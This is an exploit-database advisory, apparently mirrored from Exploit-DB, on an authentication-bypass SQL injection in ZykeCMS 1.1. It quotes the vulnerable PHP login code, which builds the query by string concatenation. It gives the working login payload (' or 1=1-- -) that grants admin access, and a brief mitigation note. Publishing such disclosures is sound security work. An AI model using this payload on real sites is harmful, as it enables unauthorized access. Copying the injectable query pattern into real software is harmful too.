ZykeCMS V1.1 (Auth Bypass) SQL Injection Vulnerability

vendor:

ZykeCMS

by:

Giuseppe 'giudinvx' D'Inverno

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: ZykeCMS

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:zykecms:zykecms:1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

ZykeCMS V1.1 (Auth Bypass) SQL Injection Vulnerability

ZykeCMS V1.1 is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted username and password to the login page. The username should be ' or 1=1-- - and the password should be 1. This will allow the attacker to gain admin control of the application.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

======================================================
ZykeCMS V1.1 (Auth Bypass) SQL Injection Vulnerability
======================================================

Author : Giuseppe 'giudinvx' D'Inverno
Email : <giudinvx[at]gmail[dot]com>
Date : 04-16-2010
Site : http://www.giudinvx.altervista.org/
Location : Naples, Italy

¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Application Info:
Site : http://www.zykecms.com/
Version: 1.1

¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
[·] Vulnerable code in /zykecms/conf/functions.php | /zykecms/admin.php

<?php
// admin.php
··········
if ($_POST['login'] != "" and $_POST['password'] != "")
{
if (check_login($_POST['login'], $_POST['password']) == true)
{
if ($_SESSION['function'] == 1)
header('Location: admin/');
else
header('Location: ');

$error_login = "";
}
else
··········
//functions.php
··········
function check_login($login, $password)
{
$sql = "SELECT * FROM users WHERE login='".$login."' AND
password='".md5($password)."'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
$data = mysql_fetch_array($result);
// echo $sql;
if ($num == 1)
{
session_start();
$_SESSION['last_access']=time();
$_SESSION['function']=$data['function'];
$_SESSION['login']=$data['login'];
$_SESSION['firstname']=$data['firstname'];
$_SESSION['lastname']=$data['lastname'];
$_SESSION['date']=$data['date'];
$_SESSION['id']=$data['id'];
return true;
}
else
return false;
}
·········
?>

¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
[·] Exploit

Frist of all join login page:

http://[target]/[path]/admin.php

Username: ' or 1=1-- -
Password: 1

Now have admin control.